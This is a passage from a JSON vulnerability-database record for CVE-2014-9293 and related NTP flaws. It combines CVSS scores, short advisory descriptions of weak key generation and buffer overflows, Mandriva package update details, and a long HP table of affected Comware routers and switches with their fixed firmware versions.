"51307)" }, { "model": "(comware r1112", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "129007)" }, { "model": "(comware r7328p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "125007)" }, { "model": "(comware r7169p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "119007)" }, { "model": "(comware r7150", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "105007)" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.0" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "network time protocol 4.2.7p230", "scope": "ne", "trust": 0.3, "vendor": "meinberg", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71761" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "NVD", "id": "CVE-2014-9293" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.7", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-9293" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stephen Roettger and Neel Mehta of the Google Security Team.", "sources": [ { "db": "BID", "id": "71761" } ], "trust": 0.3 }, "cve": "CVE-2014-9293", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-9293", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-9293", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-9293", "trust": 0.8, "value": "Medium" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "NVD", "id": "CVE-2014-9293" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The config_auth function in ntpd in NTP before 4.2.7p11, when an auth key is not configured, improperly generates a key, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability types by CWE-332: Insufficient Entropy in PRNG (PRNG Insufficient entropy in ) Has been identified. http://cwe.mitre.org/data/definitions/332.htmlBrute force attack by a third party (Brute force attack) Could be used to break cryptographic protection mechanisms. Network Time Protocol is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. \nSuccessful exploits may allow an attacker to execute arbitrary code with the privileges of the ntpd process. Failed attempts will likely cause a denial-of-service condition. \nNetwork Time Protocol 4.2.7 and prior are vulnerable. NTP is prone to a predictable random number generator weakness. \nAn attacker can exploit this issue to guess generated MD5 keys that could then be used to spoof an NTP client or server. \n \n A remote unauthenticated attacker may craft special packets that\n trigger buffer overflows in the ntpd functions crypto_recv() (when\n using autokey authentication), ctl_putdata(), and configure(). \n \n A section of code in ntpd handling a rare error is missing a return\n statement, therefore processing did not stop when the error was\n encountered. This situation may be exploitable by an attacker\n (CVE-2014-9296). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n http://advisories.mageia.org/MGASA-2014-0541.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm\n 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm\n df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm \n 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. \n\nReferences:\n\nSSRT101878\nCVE-2014-9293\nCVE-2014-9294\nCVE-2014-9295\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nSee the RESOLUTION\n section for a list of impacted hardware and Comware 5, Comware 5 Low\nEncryption SW, Comware 7, and VCX versions. Family\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n CVE #\n\n8800 (Comware 5)\n R3627P04\n JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP\n8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control\nUnit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis,\nJC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808\nRouter Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis,\nJC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing\nUnit, JC597A HP 8800 Single Fabric Main Processing Unit\n\n CVE-2014-9295\n\nA6600 (Comware 5)\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608\nRouter Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis,\nJC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing\nUnit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP\n6600 RPE-X1 TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nHSR6602 (Comware 5)\n R3303P18\n JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP\nHSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A\nHP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant\nRouter, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2\nRouter TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nHSR6800 (Comware 5)\n R3303P18\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing\nUnit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nMSR20 (Comware 5)\n R2513P45\n JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21\nRouter, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP\nMSR20-40 Router, JF283A HP MSR20-20 Router\n\n CVE-2014-9295\n\nMSR20-1X (Comware 5)\n R2513P45\n JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router,\nJD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service\nRouter, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW\nMulti-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP\nMSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router,\nJD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1\nMulti-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router\n(NA), JG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3\n(0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12\n(0235A32E), H3C MSR 20-12 T1 (0235A32B), H3C MSR 20-13 (0235A31W), H3C MSR\n20-13 W (0235A31X), H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R),\nH3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P), H3C MSR20-12 W\n(0235A32G)\n CVE-2014-9295\n\nMSR 30 (Comware 5)\n R2513P45\n JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40\nMulti-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP\nMSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service\nRouter, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router,\nJF230A HP MSR30-60 Router, JF232A HP RTMSR3040-AC-OVSAS-H3, JF235A HP\nMSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router,\nJF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP\nMSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268),\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3020-DC-OVS-H3 (0235A267),\nH3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296),\nH3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C MSR 30-20 RTVZ33020AS Router\nHost(AC) (0235A20S), H3C MSR 30-20 (0235A19L), H3C MSR 30-20 POE (0235A239),\nH3C MSR 30-40 (0235A20J), H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60\n(0235A20K), H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3\n(0235A20V)\n CVE-2014-9295\n\nMSR 30-16 (Comware 5)\n R2513P45\n JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16\nMulti-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE\nRouter,\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3\n(0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238)\n CVE-2014-9295\n\nMSR 30-1X (Comware 5)\n R2513P45\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n CVE-2014-9295\n\nMSR 50 (Comware 5)\n R2513P45\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR5040-DCOVS-H3C (0235A20P), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR\n50-60 Chassis (0235A20L)\n CVE-2014-9295\n\nMSR 50-G2 (Comware 5)\n R2513P45\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance\nMain Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)\n CVE-2014-9295\n\nMSR 9XX (Comware 5)\n R2513P45\n JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router,\nJF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr, JG207A HP MSR900-W Router (NA),\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR\n920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920\nRouter 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n CVE-2014-9295\n\nMSR 93X (Comware 5)\n R2513P45\n JG512A HP MSR930 Wireless Router, JG513A HP MSR930 3G Router, JG514A HP\nMSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP\nMSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router,\nJG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930\n4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G\nLTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n N/A\n CVE-2014-9295\n\nMSR1000 (Comware 5)\n R2513P45\n JG732A HP MSR1003-8 AC Router\n N/A\n CVE-2014-9295\n\nMSR20 (Comware 5 - Low Encryption SW)\n R2513L61\n JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20\nRouter\n H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326)\n CVE-2014-9295\n\nMSR20-1X (Comware 5 - Low Encryption SW)\n R2513L61\n JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393),\nH3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C\nRT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-TAC-OVS-H3 (0235A398), H3C\nRT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW\n1 ADSLoPOTS 1 DSIC (0235A0A8)\n CVE-2014-9295\n\nMSR30 (Comware 5 - Low Encryption SW)\n R2513L61\n JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC\nRouter, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP\nMSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE\nRouter, JF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C\nRT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR\n30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C\nRT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n CVE-2014-9295\n\nMSR30-16 (Comware 5 - Low Encryption SW)\n R2513L61\n JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n CVE-2014-9295\n\nMSR30-1X (Comware 5 - Low Encryption SW)\n R2513L61\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC\n1XMIM 256DDR (0235A39H)\n CVE-2014-9295\n\nMSR50 (Comware 5 - Low Encryption SW)\n R2513L61\n JD433A HP MSR50-40 Router, JD653A HP MSR50Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C\nMSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DCOVS-H3C (0235A20P)\n CVE-2014-9295\n\nMSR50 G2 (Comware 5 - Low Encryption SW)\n R2513L61\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n CVE-2014-9295\n\n12500 (Comware 5)\n R1828P06\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP\n12500 TAA Main Processing Unit\n H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch\n(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis\n(0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C\n12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n CVE-2014-9295\n\n9500E (Comware 5)\n R1828P06\n JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP\nA9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch\nChassis, JC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch\nChassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C\nS9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R)\n CVE-2014-9295\n\n10500 (Comware 5)\n R1208P10\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512\nSwitch Chassis, JG375A HP 10500 TAA-compliant Main Processing Unit, JG820A HP\n10504 TAA-compliant Switch Chassis, JG821A HP 10508 TAA-compliant Switch\nChassis, JG822A HP 10508-V TAA-compliant Switch Chassis, JG823A HP 10512\nTAA-compliant Switch Chassis\n\n CVE-2014-9295\n\n7500 (Comware 5)\n R6708P10\n JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port\nGbE Combo, JC697A HP 7502 TAA-compliant Main Processing Unit, JC698A HP\n7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports,\nJC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports,\nJC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit, JC701A HP\n7500 768Gbps TAA-compliant Fabric / Main Processing Unit, JD193A HP 7500\n384Gbps Fabric Module with 2 XFP Ports, JD193B HP 7500 384Gbps Fabric Module\nwith 2 XFP Ports, JD194A HP 7500 384Gbps Fabric Module, JD194B HP 7500\n384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A\nHP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD224A HP 7500\n384Gbps Fabric Module with 12 SFP Ports, JD238A HP 7510 Switch Chassis,\nJD238B HP 7510 Switch Chassis, JD239A HP 7506 Switch Chassis, JD239B HP 7506\nSwitch Chassis, JD240A HP 7503 Switch Chassis, JD240B HP 7503 Switch Chassis,\nJD241A HP 7506-V Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP\n7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP 7503-S Switch\nChassis with 1 Fabric Slot, JD243B HP 7503-S Switch Chassis with 1 Fabric\nSlot, JE164A HP E7902 Switch Chassis, JE165A HP E7903 Switch Chassis, JE166A\nHP E7903 1 Fabric Slot Switch Chassis, JE167A HP E7906 Switch Chassis, JE168A\nHP E7906 Vertical Switch Chassis, JE169A HP E7910 Switch Chassis\n\n CVE-2014-9295\n\n5830 (Comware 5)\n R1118P11\n JC691A HP 5830AF-48G Switch with 1 Interface Slot, JC694A HP 5830AF-96G\nSwitch, JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot, JG374A\nHP 5830AF-96G TAA-compliant Switch\n\n CVE-2014-9295\n\n5800 (Comware 5)\n R1809P03\n JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP\n5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2\nSlots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP\n5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot,\nJC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1\nInterface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1\nInterface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP\n5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch,\nJG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant\nSwitch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch\nwith 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1\nInterface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\nSlot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B\nHP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G\nSwitch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant\nSwitch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch\nwith 2 Interface\n\n CVE-2014-9295\n\n5820 (Comware 5)\n R1809P03\n JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+\nTAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2\nInterface Slots \u0026 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch\nwith 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2\nSlots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot,\nJG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP\n5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch\n\n CVE-2014-9295\n\n5500 HI (Comware 5)\n R5501P06\n JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots, JG312A HP\n5500-48G-4SFP HI Switch with 2 Interface Slots, JG541A HP 5500-24G-PoE+-4SFP\nHI Switch with 2 Interface Slots, JG542A HP 5500-48G-PoE+-4SFP HI Switch with\n2 Interface Slots, JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots,\nJG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots,\nJG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots,\nJG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n\n CVE-2014-9295\n\n5500 EI (Comware 5)\n R2221P08\n JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP\n5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI\nSwitch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI\nSwitch, JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots, JG241A HP\n5500-24G-PoE+ EI Switch with 2 Interface Slots, JG249A HP 5500-24G-SFP EI\nTAA-compliant Switch with 2 Interface, JG250A HP 5500-24G EI TAA-compliant\nSwitch with 2 Interface Slots, JG251A HP 5500-48G EI TAA-compliant Switch\nwith 2 Interface Slots, JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with\n2 Interface Slots, JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2\nInterface Slots\n\n CVE-2014-9295\n\n4800G (Comware 5)\n R2221P08\n JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP\n4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch\n\n CVE-2014-9295\n\n5500SI (Comware 5)\n R2221P08\n JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP\n5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP\n5500-24G-PoE+ SI Switch with 2 Interface Slots, JG239A HP 5500-48G-PoE+ SI\nSwitch with 2 Interface Slots\n\n CVE-2014-9295\n\n4500G (Comware 5)\n R2221P08\n JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch\n\n CVE-2014-9295\n\n5120 EI (Comware 5)\n R2221P08\n JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP\n5120-24G EI Switch with 2 Interface Slots, JE069A HP 5120-48G EI 